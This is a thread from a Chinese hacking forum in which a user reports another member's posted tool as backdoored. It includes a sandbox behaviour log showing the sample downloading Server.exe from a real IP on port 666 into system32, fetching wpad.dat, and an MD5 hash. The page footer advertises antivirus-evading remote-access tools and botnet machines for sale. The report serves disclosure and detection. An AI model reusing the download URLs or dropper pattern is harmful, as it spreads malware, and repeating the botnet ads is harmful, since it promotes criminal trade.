举报后门帖子

134679 · 发表于 2016-3-15 12:04:52

举报人：134679（我是雷锋不用谢）
被举报人：aimieimong0
理由：举报后门
链接：https://www.hloday.com/thread-2221-1-1.html

带证据：网络行为

行为描述：	联网打开网址
详情信息：	InternetOpenUrlA: http://<FAKE_SERVER_ip>:128/wpad.dat, hInternet = 0x00cc0010, Flags = 0x00000010
行为描述：	下载文件
详情信息：	C:\windows\system32\thundet.exe URLDownloadToFileW: http://222.186.58.164:666/Server.exe ---> c:\windows\system32\thundet.exe
行为描述：	连接指定站点
详情信息：	InternetConnectA: ServerName = 222.186.58.164, PORT = 666, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000 InternetConnectA: ServerName = <FAKE_SERVER_IP>, PORT = 128, UserName = , Password = , hSession = 0x00cc0010, hConnect = 0x00cc0014, Flags = 0x00000010
行为描述：	打开HTTP连接
详情信息：	InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004 InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0), hSession = 0x00cc0010
行为描述：	建立到一个指定的套接字连接
详情信息：	URL: wpad, IP: <FAKE_SERVER_IP>:128, SOCKET = 0x00000510 URL: , IP: 222.186.58.164:666, SOCKET = 0x00000514 URL: , IP: 222.186.58.164:666, SOCKET = 0x0000050c URL: , IP: 192.168.0.100:8080, SOCKET = 0x00000500
行为描述：	读取网络文件
详情信息：	hFile = 0x00cc0018, BytesToRead =4010, BytesRead = 4010. hFile = 0x00cc000c, BytesToRead =2048, BytesRead = 2048.
行为描述：	发送HTTP包
详情信息：	GET /wpad.dat HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0) Host: <FAKE_SERVER_IP>:128 GET /15.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: 222.186.58.164:666 Connection: Keep-Alive GET /Server.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: 222.186.58.164:666 Connection: Keep-Alive
行为描述：	打开HTTP请求
详情信息：	HttpOpenRequestA: 222.186.58.164:666/15.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010 HttpOpenRequestA: <FAKE_SERVER_IP>:128/wpad.dat, hConnect = 0x00cc0014, hRequest = 0x00cc0018, Verb: GET, Referer: , Flags = 0x00000010 HttpOpenRequestA: 222.186.58.164:666/server.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
行为描述：	按名称获取主机地址
详情信息：	GetAddrInfoW: computer GetAddrInfoW: wpad

MD5：

0a795b1c248ca30b0b281260f72a05dc

关键性链接

下载文件
详情信息：	C:\WINDOWS\system32\thundet.exe URLDownloadToFileW: http://222.186.58.164:666/Server.exe ---> c:\windows\system32\thundet.exe

134679 · 发表于 2016-3-15 12:05:55

还有此链接被我打死了哈哈哈哈

134679 · 发表于 2016-3-27 20:58:18

我发这个没奖励吗？？？？

		自动登录	找回密码
密码			立即注册

[悬赏公告] - 严查灌水，打造一个无水论坛，从即日起.请大家互相监督，发现恶意灌水的，请发贴举报，核实后会给予5-10的墨币奖励。	[官方公告] 从今日起所有会员发布工具必须到审核板块进行审核，如有违反永久禁言处理！	[招聘招聘]-招聘各方面给力版主，要求每日发帖不少于3贴，每天在线时间6个小时以上，具体福利和待遇联系TG客服或者在线管理员	[官方公告]1.发现网盘下载地址失效！可以发贴举报审核证实后给予奖励10-20墨币。2.即日起！不管是谁发贴！都不能带QQ群已及个人QQ。个人网站,发现后严格处理。	[官方业务]-加入墨客安全网Vip,圆你日抓千鸡梦,各种精品教程,免杀远控,压力测试等你拿,期待各位会员的加入,即可享受众多福利！
【官方公告】论坛所有广告均为商业行为，需要交易的请尽量走担保程序，所有因广告产生的任何纠纷请私下解决	【站外广告】大量收色刷！刷单肉鸡！带飞机肉鸡！寻内网横向技术！懂的来，小白勿扰！长期包养色刷，刷单，带飞机海外盘国内盘灰产肉鸡稳定鸡商联系飞机：@seeok91	【官方业务】精品广告位招租，需要请联系官方TG客服	【官方业务】精品广告位招租，需要请联系官方TG客服	【官方业务】精品广告位招租，需要请联系官方TG客服

[投诉（带后门）] 举报后门帖子

最佳新人

灌水之王

乐观达人

音乐大师

兄弟义气

论坛美眉

站长推荐 /1